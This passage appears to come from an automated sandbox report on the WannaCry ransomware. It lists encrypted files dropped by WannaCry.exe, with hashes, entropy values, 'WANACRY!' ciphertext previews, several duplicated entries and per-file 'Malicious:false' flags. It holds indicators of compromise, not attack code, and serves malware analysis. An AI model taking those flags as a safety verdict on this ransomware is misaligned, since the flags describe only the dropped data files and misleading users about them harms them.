                                                                              Malicious:false
                                                                              Preview:WANACRY!.....^...eI.....r......Ms'..;.../J}..=..u...9...[.{*....^.q..7...]`.3.....0. ..j...E..Y..!.......3.........m`..v.nG.ga.Is<.u..@...WK...R......V}....c62^....C.......~..U..S&s..J.4._."..g....S.."..Y..pr..l.c.`@LJ.... .o...q.Z..y>^..m.).......K....:q............x..2..........!../....e..KT.r.........QB..I}..x.liP.zwz:X......T]~x...c...D...8.Lo..H.....$...`k......K...bg.../8+....w.....WN^.V.-.....3.[D}.Z.s..?.*s4..b<...MC..uR$.*.....@....4.....s....K.}EZ....Kc..9h....j.<.`.ch..c"A .....[....4K...mf..++,.Nj.....rZ.....&..%tA....t~E.af.aq./...\w.|....+.xz.N.\..<U53......*@...'.B.+>.!..b.[._....g;L...1...+......8..e!]v..Y6.5....\}..M...mH.....Z.Iy.Qsa......c!E......Yk.~.........(...}..R..]I.GO...3B...{m"OpuQ.03>.c?..6...{...j..WM1;.../M|.Q.m..o.L.[....)9.#.M.9C...d`T.f..K.=.L.....>.0e..d.......H?.".21a.]...S...B...;.9._.3y.".K...........=.'pE@...q...|.%w...o..$U.P.jUK..K=.%..T.....\.iN..H.!...M....>..F.7..DG....i].......J.v....?.m.\.t...vm..O.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.849159359534632
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/XrazHy/1LFHo8HG5Zv+1xqOTHr9WI4iKlsuLE92I4x5ZEZQcNMJb8fE0BNZ/9:bk/2DKLVlGbv+1gcL9WI43l7Y1GECCMQ
                                                                              MD5:D0F43CD640678E9855C48427A2C678B1
                                                                              SHA1:080AF92CCC089273EC48F03AD7037621598EB925
                                                                              SHA-256:1D1D00BCBDADE36248EF59C7986B352D78E901CC666023F73887A5860D020EF1
                                                                              SHA-512:2B3A571D9DB6A1269B3D92554B84C60E0E55289E78171792D4EB4A6F531FE5B1225E0C98C5CDB51E2B283E6837CAF0BCF194CFAABE55AF4409D51075B17722BD
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....^...eI.....r......Ms'..;.../J}..=..u...9...[.{*....^.q..7...]`.3.....0. ..j...E..Y..!.......3.........m`..v.nG.ga.Is<.u..@...WK...R......V}....c62^....C.......~..U..S&s..J.4._."..g....S.."..Y..pr..l.c.`@LJ.... .o...q.Z..y>^..m.).......K....:q............x..2..........!../....e..KT.r.........QB..I}..x.liP.zwz:X......T]~x...c...D...8.Lo..H.....$...`k......K...bg.../8+....w.....WN^.V.-.....3.[D}.Z.s..?.*s4..b<...MC..uR$.*.....@....4.....s....K.}EZ....Kc..9h....j.<.`.ch..c"A .....[....4K...mf..++,.Nj.....rZ.....&..%tA....t~E.af.aq./...\w.|....+.xz.N.\..<U53......*@...'.B.+>.!..b.[._....g;L...1...+......8..e!]v..Y6.5....\}..M...mH.....Z.Iy.Qsa......c!E......Yk.~.........(...}..R..]I.GO...3B...{m"OpuQ.03>.c?..6...{...j..WM1;.../M|.Q.m..o.L.[....)9.#.M.9C...d`T.f..K.=.L.....>.0e..d.......H?.".21a.]...S...B...;.9._.3y.".K...........=.'pE@...q...|.%w...o..$U.P.jUK..K=.%..T.....\.iN..H.!...M....>..F.7..DG....i].......J.v....?.m.\.t...vm..O.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.800885604834709
                                                                              Encrypted:false
                                                                              SSDEEP:24:/wDz8N1uO8T7TSX9u7MJcsnLf/+mhWzPeR4moqW:/wDdOIiMMJbYLmoD
                                                                              MD5:82C0F2F8A244637CC8C70EC2B00C1D22
                                                                              SHA1:9804B331EAC9949C8B206A98C593385EC9F939F4
                                                                              SHA-256:D6D4B37CA4E06B06A54787255A214930D369B3C5334477D8A39B873832D21100
                                                                              SHA-512:6E701618E427D457BBED28708A75766620CD21F6DBB2FCEDB9D9EC1D695426A21B5C7E1AC8A6C6A46F1E87AB8CFA10C37FE373CD111A8AE91EE19B03A1EFBC18
                                                                              Malicious:false
                                                                              Preview:.....U..2v..w.Y;....@.`.U.....3.....p...:.._O....j...\...L..!>..6.1b...L...2...05.Qz._?.Q>.....8..)}i...*%A.]S.....D.........rF..;ec)..E...#_.s~....vC.[......VR......C...*.7....G..~.<..qC.nB.......4....^...^{0.....l......G.2U..pFJ.....c0r.PC.c..;.a...8....)....8.9........}.....2....~....[..S........!+B.[.74....7..n]<...."C.....#!....x^kK..o...exu.8..1...a?.(\...qN......L..#.E|.$s0(.>."K.O..#..Q......*Eu.....8<.......?.9.e.......v==..U?....241..D5..S.EP?3k.^.[I...I..a...r.J..W..a. <.i..fKR.u.H..VY9.....}._..~....|..#d.re-f04........\..9.D...F.]....g..b...2.2...v2.z...O'..T`......[&X.Y+O.c"...e.\...H)...0.~....v..W.q.=G.A.%6..GABU..#...pK.W..e...I.Y.i@..b............c..(q..!..]_....`.<.o=u.c.Fv$Na..]|...E'&.........h.z..v....SN....$TN1.......X..H...4..CRy.-!..[L.Py{...c...&D.|......~.6c.:.N......I.g~`..k..0..A..C..[!....).i.>8x......S.s9WN..flv..\{..c..i9./.@t..;.$jD.......].*T...]..s..8|.Z.g.v\h.}.:..R.F....=.......x(J$5..:.&.?%...jd}+.x...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848867373249917
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkVg9Gu3SV8lZPw8RSnNzjlKRKzN/OzVBbz4EOmGWnidF/NZGnBe0JCVZV:bkVElNwDNXlKRc/OPKB73GnBNC7V
                                                                              MD5:4BE27E58CACEA1AF9ACE8AFF9EB72D33
                                                                              SHA1:820A0E984DE017054192E5B8CB91004C87411930
                                                                              SHA-256:B0497A2CB2A727425640286AFDB344F6D6A3ACAA81F530673F5D0B3AB2B94EF8
                                                                              SHA-512:6FF695001B43622F738CB4FFED9FDE570A3099D061A634335E1CE6FBAFCE81C2FE4418C54F8B5BA3515EB3C412FC934AF8D3FD0C12BCE4098BF075FC0C41485A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....F%....a.y..e..S.C...WG0uN......_C|...S..S...A.H3*&e..z:.;.ymA.oU9.<9.P:...5,....l.cC.;.>.#..../..w.....]JV5.....R..YR.E.p..<.].s.>..\|...=.^9.@.2]G.8m..S.L+...../|..}.d.%...*.c..........#`k.I.:..!#.Db.[...>...vo....u.>.......;....Eg.CjQy....W............(.....>.5..Z....:5..o*..^[...a.Q...V...L..8}.y.=....{4p5.....]'..`Ee.}..wi....".t..+._.j..,.km.Q......zl'D+.iy..._.O0C..H....g.."..h::.....b..t.....6....S..]..A=..c.."..O.$Y.P...T.........R.....N.k..A5...;....7E.b}F.H.M.U..n-....#<X}.B..`.t..:...df..y.ra...Pz..S.J.Ha.O-.D#........K..-..w..>n.L.e@...Q...K..V...e3-...<...Q~.R!..X.o...}v......u.D(...V.?>.R.<......L.9(.vD..H.....A...PYf....%M....&JcW2...;6>.a..kS.{)q....d...0..T..(Caq..j.:.B./.4.K...]........3x.......TJ...V-..t....|.p.....`......h.]...Z..^..O.......v.{...V._7..F...E.,...+JuGhC..._....F&......3..$5..(u4.....j&...z[.._.g.>..J.....q....P.)R.e..i.Hg/.`..zt.HN^..:...%...pm....Bg.....l..!6$N...H"..`..*+....4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848867373249917
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkVg9Gu3SV8lZPw8RSnNzjlKRKzN/OzVBbz4EOmGWnidF/NZGnBe0JCVZV:bkVElNwDNXlKRc/OPKB73GnBNC7V
                                                                              MD5:4BE27E58CACEA1AF9ACE8AFF9EB72D33
                                                                              SHA1:820A0E984DE017054192E5B8CB91004C87411930
                                                                              SHA-256:B0497A2CB2A727425640286AFDB344F6D6A3ACAA81F530673F5D0B3AB2B94EF8
                                                                              SHA-512:6FF695001B43622F738CB4FFED9FDE570A3099D061A634335E1CE6FBAFCE81C2FE4418C54F8B5BA3515EB3C412FC934AF8D3FD0C12BCE4098BF075FC0C41485A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....F%....a.y..e..S.C...WG0uN......_C|...S..S...A.H3*&e..z:.;.ymA.oU9.<9.P:...5,....l.cC.;.>.#..../..w.....]JV5.....R..YR.E.p..<.].s.>..\|...=.^9.@.2]G.8m..S.L+...../|..}.d.%...*.c..........#`k.I.:..!#.Db.[...>...vo....u.>.......;....Eg.CjQy....W............(.....>.5..Z....:5..o*..^[...a.Q...V...L..8}.y.=....{4p5.....]'..`Ee.}..wi....".t..+._.j..,.km.Q......zl'D+.iy..._.O0C..H....g.."..h::.....b..t.....6....S..]..A=..c.."..O.$Y.P...T.........R.....N.k..A5...;....7E.b}F.H.M.U..n-....#<X}.B..`.t..:...df..y.ra...Pz..S.J.Ha.O-.D#........K..-..w..>n.L.e@...Q...K..V...e3-...<...Q~.R!..X.o...}v......u.D(...V.?>.R.<......L.9(.vD..H.....A...PYf....%M....&JcW2...;6>.a..kS.{)q....d...0..T..(Caq..j.:.B./.4.K...]........3x.......TJ...V-..t....|.p.....`......h.]...Z..^..O.......v.{...V._7..F...E.,...+JuGhC..._....F&......3..$5..(u4.....j&...z[.._.g.>..J.....q....P.)R.e..i.Hg/.`..zt.HN^..:...%...pm....Bg.....l..!6$N...H"..`..*+....4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.806264788497839
                                                                              Encrypted:false
                                                                              SSDEEP:24:xFIli9Bjsz9GS9q6WRt2An2miftBQy1gsa/y1J5meadlNd/kLje23:fEi9BjUY2A2mUtB71gsCy16DT+Si
                                                                              MD5:782E900BB2CBA34D6A2BB5BAF4D41F9B
                                                                              SHA1:9E0EAC7227AEF3B5DABC664912511F862D1AAEA0
                                                                              SHA-256:5AADDAEB87CCA38C3309B0A8BD5E2EAE1A4095FF32E8F66830C833AAB1744F9B
                                                                              SHA-512:F971347262E4332CA7222468315E93BDB5DF4BE5130CA64E6D1EC0841E7A7FC2649649D2A8098B2322A8DDF951FA1B63B27AAD00576236372547A6A595942092
                                                                              Malicious:false
                                                                              Preview:....A.. .P1`...g..0N.7.....$.8...Q/.W.Y..a..\..4...k.~d^Z.0.B....X.>.X..2......Ji...z.....W...{8{A...n.0'....-......jb..@..k..D..Q.U..Cw...>..v...c...m...X%.I.>Q.9../.S1.A..38M...SU......:......kc#&..*C.'.....y.`...t..j..Y..E<m+!w.+NC./..-4.....-......a.b.=....J.SD*W..Z...nw>.A.|.u..lz".[.h...5..BH.(........}....7...<.#.t>...#..V.t|......FW.L..X.:."..e...^..>6..kG...V.!.x...:.....m.`.<.}.f.i.x+Ao_...}^...]........!..a.....f?`.kR@..V.........^..a.5.,c...E.z.a..T.&XA.)Ef.B.....`{$...:...&I.r&......c..{...,.=A.O7...ht....?....G.:....)4J?*)M..j..2...K2...{...?%'..X,...v..Vt,...m....J.....#M...dl.@0.C.IV&.I.w.z....[.......RL+.v%..r.s...z..*}.K... 2KL..H.T.(.(*.f.@..a.v.......N}.@....;.....i....kK.|...-.&.Z..s.......Hz(..F....yh.....5..."Ij.4......a.......5,.!...}.^*.......aq..'....s<a.!."6E...,..\.v.v...m..m.:.....$..G.k@..4J.../tK..<bC.<M.M:./?.b.....0.Bgh,......c.....?..oQ&.@c%x..>x*i..F.3.....*.T.0.......GY\.^N7H.[.w.VC.D$..$..UI&.2..v/.\.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.840024379595557
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkCsA+xaHLBwszwDHkF6PENw3n0PB3Qf+E7dLMIGIgTN1PhEvTmCJR0PGKH:bkCsAUszwDH58w30BGXJEIgTNBhrC4P5
                                                                              MD5:175FB4E4CA5A6716FD5F2576E521507A
                                                                              SHA1:3AD423A214EE5DED7E254E304A1375E037CD114C
                                                                              SHA-256:F00768008C9A54ECACE93FCF8B4A85DC31AB71A517073679455FB7121FA8B319
                                                                              SHA-512:DF78FAF5E1D56F659C2CED251938B08DD6AB890C3EEBAAC7A8DF7797440003E77EAFA7953BFD2938111ECA370A8E88043D46075D882DCFA9847B05B8AF1AC371
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:.e.*.+.......A..*NB9....z^W.Zt.K..q./....F..].A.P!.=.5.:....9B..'....-.....qh Iu.q....bvBk.u...*....qmM.y...8..L..S1S..u...x......oy..H..2[..":.a.x?...p..2_+..tX....h[......+...S..M.Cs...w3.l..:..c&.'?g....*l..7..M....-L.T.......e..m....m..OA..............I...B.S....Q.Y..s.=;.F..6...c.... .u[nr.w;P.K...P.CD,...<.....|I...9.f.....m..^7w%U.c..yh.......v..2$1.......N..K..`.x5.oY.S..R.6X&denX.......Q...w.....>.. .....c..{u...........W..#..y....Aw...r.I..6..>N...x.....!.....8..sH..C.;.......!c..&..s.W(y..&.z..O.I.P..3e.eg..|.TI...d4%b....yM]._..@...#.fO...........f0v.8(..W..W..t.-..#..Ok.o;T.....H....-.#..(B8.t..T.....%...oJ...W;.A?;.O7a1K5.F..*.B.V:.EPsg...5......7..F.o.../..?."N4...1......h6..s.........k....Q....u..^.7.X@.............`=nw.k. ....+1]M./.L.........Q.a...-..p..mA..=B......o...n.2..6c{..Y.]L..F.......@...[..8K.?.t..W.k+. ..-L....i... BH..9..8..r./.d.D<H.QQKaMG.?.i....Xk..$l... W.?..Q..=..2.DR...l.....[..t.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.840024379595557
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkCsA+xaHLBwszwDHkF6PENw3n0PB3Qf+E7dLMIGIgTN1PhEvTmCJR0PGKH:bkCsAUszwDH58w30BGXJEIgTNBhrC4P5
                                                                              MD5:175FB4E4CA5A6716FD5F2576E521507A
                                                                              SHA1:3AD423A214EE5DED7E254E304A1375E037CD114C
                                                                              SHA-256:F00768008C9A54ECACE93FCF8B4A85DC31AB71A517073679455FB7121FA8B319
                                                                              SHA-512:DF78FAF5E1D56F659C2CED251938B08DD6AB890C3EEBAAC7A8DF7797440003E77EAFA7953BFD2938111ECA370A8E88043D46075D882DCFA9847B05B8AF1AC371
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:.e.*.+.......A..*NB9....z^W.Zt.K..q./....F..].A.P!.=.5.:....9B..'....-.....qh Iu.q....bvBk.u...*....qmM.y...8..L..S1S..u...x......oy..H..2[..":.a.x?...p..2_+..tX....h[......+...S..M.Cs...w3.l..:..c&.'?g....*l..7..M....-L.T.......e..m....m..OA..............I...B.S....Q.Y..s.=;.F..6...c.... .u[nr.w;P.K...P.CD,...<.....|I...9.f.....m..^7w%U.c..yh.......v..2$1.......N..K..`.x5.oY.S..R.6X&denX.......Q...w.....>.. .....c..{u...........W..#..y....Aw...r.I..6..>N...x.....!.....8..sH..C.;.......!c..&..s.W(y..&.z..O.I.P..3e.eg..|.TI...d4%b....yM]._..@...#.fO...........f0v.8(..W..W..t.-..#..Ok.o;T.....H....-.#..(B8.t..T.....%...oJ...W;.A?;.O7a1K5.F..*.B.V:.EPsg...5......7..F.o.../..?."N4...1......h6..s.........k....Q....u..^.7.X@.............`=nw.k. ....+1]M./.L.........Q.a...-..p..mA..=B......o...n.2..6c{..Y.]L..F.......@...[..8K.?.t..W.k+. ..-L....i... BH..9..8..r./.d.D<H.QQKaMG.?.i....Xk..$l... W.?..Q..=..2.DR...l.....[..t.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.841672740278235
                                                                              Encrypted:false
                                                                              SSDEEP:24:NJcPIs2nHxj7Vic2MGyRtNh/0zeQXwn/urzIT:NCjYH5JGyRt0zXO/Qz6
                                                                              MD5:B1E53B51F6AC767A18B00FC47802BE19
                                                                              SHA1:6BFDAF328282E62D922AE8A0B629A8F56714FE6E
                                                                              SHA-256:A4C134B049C0D75E38D749E50651AF6637758ED44F90EFC87B339370719D7DCD
                                                                              SHA-512:E066DA1C83AEDCD672AAD48F33FA20AA4307D629584373418593280C9C6998CC63AB738AC5DB60A64F9FEAE739F48FED39BD761C3DCE883E009D120A26D23ED5
                                                                              Malicious:false
                                                                              Preview:....`.. ....h.S..5..')......#.pn..h..o.X..m]o...i.z..IB.&.bP'jy(.Z...\...1...ze..s....xu...d$9..j..l.d...e.?k...8O.....E..GJ....qNv.7..gg.b/..7nd.P....$.gSa&dj{..<..3......7D.I...Et.QV..Va".s.1..*..Rv...7...U...@.L.9.0..\d..g..l.~.R.E....$ik.+....g......T.......A........j}`....7o.......,..%..=.M.."P+u=b.."...]...)M...\&k...%B...........Z.q:...\..$.-..d.>0s..Kwv........J.....o9(..rr.S..W.'...3=.W|^..).&.:w..-.....x=....+t.(.9..7...'.oe.7.[..0..>.t......I..)(>.R......b.R.$..z....<.~....~5..dT...Bd....)....Iff.~%b.aO.(V.uX.......-&.*.;.C.*{.Zj..w..l....>.../..c..7.)n.....9X(.oN.....#W...D.Y..x..nq..B+.eW..........t./..Arr.+..X2,....r&'........kO..J\.6..CO~.% .1%...-../..?....uj...l...Al....s..=<..K.y..?.!.d.=.-..'...'....#...c.JB..F"...)V....P.np.;.@|.....pgD. . %sj5@.Z.3L..............0.B.dE......q"...}.=S.t...Z]....)|.YXJ...X.I..I.../#..F..tf.w7...k..{....t.....=..8W.m..8[..c'.p.h.C..(...L.-t...zB..n.....^......Jk.p....M...v.......|~iX@...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827903774471028
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkZ48vmx4p8ImLDXcmxdTL1IMZz35jt54yKtaD1NHFc4PU1wqO/97UdZkABaC:bkZ48vm+YDXcmxdmMZz3L5jBNHFBU6b2
                                                                              MD5:997B28E299E7368110690627821328BD
                                                                              SHA1:B8E04EB7B0834D0188A5F587DA93268A2E5D1FC4
                                                                              SHA-256:23EED92B56FF240EB53D732099067B3CA0636B03F0E4573CC07E542B9280A0C9
                                                                              SHA-512:FB2F222CA2A2DFD31C9DF1FB4AD5C6EFF483A5798C5A528BC3E62773F4867AA1A2EA738895182891FF11F90A0C8712295F6E99CCF0FD35041DA7A3A944BB6D26
                                                                              Malicious:false
                                                                              Preview:WANACRY!....N.=`......p..F.]....j..~..Z(.*c.y.......p..r:..Bh"....N.....rU........|.Xh...6.B).4m...3....D....rd...c....LS......-.B.....N....s~b...e..qa.[.7W,+.@.........w.\..R%+.f0..x.?.e..a.Z.?......v;..D...3.aSJ...oW..Y.c@...........|.......^M%..h.V.r.................c....nz.p...G.V..R....~(.SZ[g.)...f..Ba......N.......M.3...Xq#7..V.4|...~....C....jf..|j............9.;.<......(>..I...d...j.=v[.j......Sl.c..O..C ..m$X.rZD?.....X.a...5..I.O *...~.z.<L.>..z"|..jy... ;...3."N.+....6[.....Z....b.6..(K..{Qs,.6F...N..q.z:1:.p......M....)......v..k[........7,.y.....o..z....[.mH...H?.....T.h..&..H:.j.`A.Z..H$1..|.:......*.N.............V....+./.....:...Jg.)..{.Fj......{F<.A..p.5ZuG.*..!.G...b.,%.....=..j.n-.1..2.....D....[Q?...v../..N...'0(.y..)7.>....1d...'..k.0.isre..OSW\T z.A.@......0.h....w..,S.+.Q....PA..g.#...m.,..=SCb..o.KC.u..H$..._>..+d...........,{.-.`...zP.%....Eq..1...G\.#.A..t.}...;......../~M.....|.P..W'6E$66>.......f...si.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827903774471028
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkZ48vmx4p8ImLDXcmxdTL1IMZz35jt54yKtaD1NHFc4PU1wqO/97UdZkABaC:bkZ48vm+YDXcmxdmMZz3L5jBNHFBU6b2
                                                                              MD5:997B28E299E7368110690627821328BD
                                                                              SHA1:B8E04EB7B0834D0188A5F587DA93268A2E5D1FC4
                                                                              SHA-256:23EED92B56FF240EB53D732099067B3CA0636B03F0E4573CC07E542B9280A0C9
                                                                              SHA-512:FB2F222CA2A2DFD31C9DF1FB4AD5C6EFF483A5798C5A528BC3E62773F4867AA1A2EA738895182891FF11F90A0C8712295F6E99CCF0FD35041DA7A3A944BB6D26
                                                                              Malicious:false
                                                                              Preview:WANACRY!....N.=`......p..F.]....j..~..Z(.*c.y.......p..r:..Bh"....N.....rU........|.Xh...6.B).4m...3....D....rd...c....LS......-.B.....N....s~b...e..qa.[.7W,+.@.........w.\..R%+.f0..x.?.e..a.Z.?......v;..D...3.aSJ...oW..Y.c@...........|.......^M%..h.V.r.................c....nz.p...G.V..R....~(.SZ[g.)...f..Ba......N.......M.3...Xq#7..V.4|...~....C....jf..|j............9.;.<......(>..I...d...j.=v[.j......Sl.c..O..C ..m$X.rZD?.....X.a...5..I.O *...~.z.<L.>..z"|..jy... ;...3."N.+....6[.....Z....b.6..(K..{Qs,.6F...N..q.z:1:.p......M....)......v..k[........7,.y.....o..z....[.mH...H?.....T.h..&..H:.j.`A.Z..H$1..|.:......*.N.............V....+./.....:...Jg.)..{.Fj......{F<.A..p.5ZuG.*..!.G...b.,%.....=..j.n-.1..2.....D....[Q?...v../..N...'0(.y..)7.>....1d...'..k.0.isre..OSW\T z.A.@......0.h....w..,S.+.Q....PA..g.#...m.,..=SCb..o.KC.u..H$..._>..+d...........,{.-.`...zP.%....Eq..1...G\.#.A..t.}...;......../~M.....|.P..W'6E$66>.......f...si.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PGP Secret Sub-key -
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.816025489675063
                                                                              Encrypted:false
                                                                              SSDEEP:24:d4k7x01y3gcpvYdlB4wDMeLUwENy4OqICqQB+Y3:T08hYDB4wFLqNy4zICqQB+Y3
                                                                              MD5:5578C70F2C35F69BA019EEF3D58CC8BD
                                                                              SHA1:7326CBE8F74B3487A46FA95D2BE7658286DD0912
                                                                              SHA-256:C01BED12B14CA77C7F8D98B5E37882AE9989A06A5396B9CA5C03FE2511A70EE9
                                                                              SHA-512:41AFA54C85ADFAE6937176F3C201C8AC0E0FEAD8F66F81487369148BA893F7894D5A357CF290391CD0561B35044AF523C892D2C3BE61C4C362A34509C53D28B6
                                                                              Malicious:false
                                                                              Preview:..C.q..G... QN74...$...D.....J.....%......y_.B..u...=n...R.T.d..P.n./...e#Mp{|O...$...!.N..O.}r.-.....f..^..P~A...S..4p.........8.....$I.......-.>.A.K.9.U*.......U.D.o...M..(7-'}V.=aif.s..z...=?.=...<.AT.DPJ.xR....pJ..A....%^p.h.5..5}i../;B.......+.b....{5c...'...3v..)f.....&.....l...t.@#.A.Sx....hsv........4P.J.VQ9.X.;nt.f.1.QN...\9[H.x.4"..O.a.Q!y.&...|..T.&.j... ......2.....Y.f.%>,.e>[..e.PCm..6}7..EYU. .*a.-.i.+..*..(G|.Z.;.=....?..8.v.r..G*......(.#:...^.H..L.;.#...`..vE.+viyN....C%. .=.Mq.......UB|.7./...1......~...$.....b... jL..zVB&...A.'w.Ei.N.@....^.u...VD..9p.x|.....8...y..k..q.a...._.l..;5A...W..M.o:.*......1.20.q....{.U..._..7....:.7..pP.1 i.......*8...H......0..:.<.(..o....R...~.!6.@..%5.5b...AF..........Q~o.]M.".lph...g..U..A[...&.xl......8qD,c...yI9.\}uH.f'.j(.F.....1..X...R...:X.@.z...Z.uge..p....L'..A..n*ml.@n....i?....$.i=.>)MP.`.......(.g..W.IM..$...o.^.*.LA"..L.\Z/...W.Rn...Tv..~{{....R`..*(.....=...U..#.MW...u.c
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.813253980770963
                                                                              Encrypted:false
                                                                              SSDEEP:24:bka8YL1QXdpmKNJBD0apZ5VL3StEU9WX9KexBjS6VcACEYu8RpckrVEq6:bk3I2thNjBhVL3yEU9t6BRcAau8gkJEN
                                                                              MD5:807A680760EC44FD81F3F7B355327408
                                                                              SHA1:D83906D2638154F134CC81D717307277A32FAE76
                                                                              SHA-256:664D7A03A0CDE1EB57C7D15AE569BEADFFFECCC111C5920438D5A6CE19FBCCAD
                                                                              SHA-512:C440C9ADB80EA8A4E516CA104CE3E9EFC237CB7B509454F9AA8C9CA0833BE87F13DF85A756E69BEA12092D9D6CC5FF06B4B6A3B6012CE3E0FCE56934B730F79B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....A..zD61i.6]`.$n.sH....o..q-.Z..wjf)|(q..'..2G.]...L....cX....&..c^x.l.V.Sf.[l..^=A."..Z.P......+...*.....:...J...._...o..h.#}.........>U..D;.a......X=..#.x.xX]....d.vkW...k8s.tB%G....W.......D...]..\.....^.C.c..7...'..V..Ux..$..s...z.(ml.2Z#k.U.............Kc...../.....D..U..}7.~...{[.Z....V...O2..Ov.x....]DS|.g...".3|wv#.........J...T...3m.m..A....G.u.....l...{..!es"....4..r}[.@..jCL.'.....dE.b..|..M.-&+..(..(g.....n........ ._...]Z.. u..W....F@.X)f.}.*....+.V....F..),.,`JkB..Dv.;9.NlK:..}..*..p`.*>..38.n>m ..di].{d.eU@.......0........k.\...?...d...!...m$&O.....D.....Y..9.x8....V....;.l*}..<..+.....f.....h.ts.%..l....he...xr....6s.".|.............;.9.;..k...k.......<..(.r...:.'d..S..|..(+.Le[.n.e!......WH...6.|...c...B..]..g.=............S_...(..X.....D.d.B.?.q.3.@..^.L.....Xr....?.4..'.3..........l...L...L..sG.....i..w..c.v.o!..25..d......P.m@..c}.2..<79.0.....I..<#9.TDY..j...Caf..T...A....Kuc...l..8Df....:...............e...d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.813253980770963
                                                                              Encrypted:false
                                                                              SSDEEP:24:bka8YL1QXdpmKNJBD0apZ5VL3StEU9WX9KexBjS6VcACEYu8RpckrVEq6:bk3I2thNjBhVL3yEU9t6BRcAau8gkJEN
                                                                              MD5:807A680760EC44FD81F3F7B355327408
                                                                              SHA1:D83906D2638154F134CC81D717307277A32FAE76
                                                                              SHA-256:664D7A03A0CDE1EB57C7D15AE569BEADFFFECCC111C5920438D5A6CE19FBCCAD
                                                                              SHA-512:C440C9ADB80EA8A4E516CA104CE3E9EFC237CB7B509454F9AA8C9CA0833BE87F13DF85A756E69BEA12092D9D6CC5FF06B4B6A3B6012CE3E0FCE56934B730F79B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....A..zD61i.6]`.$n.sH....o..q-.Z..wjf)|(q..'..2G.]...L....cX....&..c^x.l.V.Sf.[l..^=A."..Z.P......+...*.....:...J...._...o..h.#}.........>U..D;.a......X=..#.x.xX]....d.vkW...k8s.tB%G....W.......D...]..\.....^.C.c..7...'..V..Ux..$..s...z.(ml.2Z#k.U.............Kc...../.....D..U..}7.~...{[.Z....V...O2..Ov.x....]DS|.g...".3|wv#.........J...T...3m.m..A....G.u.....l...{..!es"....4..r}[.@..jCL.'.....dE.b..|..M.-&+..(..(g.....n........ ._...]Z.. u..W....F@.X)f.}.*....+.V....F..),.,`JkB..Dv.;9.NlK:..}..*..p`.*>..38.n>m ..di].{d.eU@.......0........k.\...?...d...!...m$&O.....D.....Y..9.x8....V....;.l*}..<..+.....f.....h.ts.%..l....he...xr....6s.".|.............;.9.;..k...k.......<..(.r...:.'d..S..|..(+.Le[.n.e!......WH...6.|...c...B..]..g.=............S_...(..X.....D.d.B.?.q.3.@..^.L.....Xr....?.4..'.3..........l...L...L..sG.....i..w..c.v.o!..25..d......P.m@..c}.2..<79.0.....I..<#9.TDY..j...Caf..T...A....Kuc...l..8Df....:...............e...d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
